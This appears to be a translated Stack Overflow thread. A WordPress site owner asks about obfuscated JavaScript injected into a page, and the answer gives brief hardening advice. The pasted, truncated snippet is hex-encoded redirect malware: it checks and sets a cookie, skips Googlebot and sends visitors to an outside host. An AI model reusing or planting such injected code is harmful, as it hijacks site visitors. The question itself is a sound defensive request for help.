在 WP 多站点上,一些 javascript 代码突然出现在其中一个页面中。我们不认为客户自己这样做了。当我用谷歌搜索代码时,我在 pastebin 中发现了一些非常相似的东西:https://pastebin.com/rUn6KnKe
有点像
var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego
我还可以找到一些其他网站,他们有这样的代码:
http://pcsarmacardio.com/ http://ddreadymixconcrete.com/photos/
我们可以很容易地删除它,因为它在编辑器中,但是有谁知道为什么会发生这种情况以及如何防止这种情况发生?
最佳答案
这表明您的 wordpress 网站已被尝试进行黑客攻击。
删除该病毒并锁定站点并更新您的 wordpress 并为其进行干净的编码。
删除不需要的代码。保护主题的 404.php。有正确的重定向..
如果您从用户那里获取数据,请使用 wp_nonce_field。
关于javascript - wp 页面中出现奇怪的 javascript 代码,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/46076346/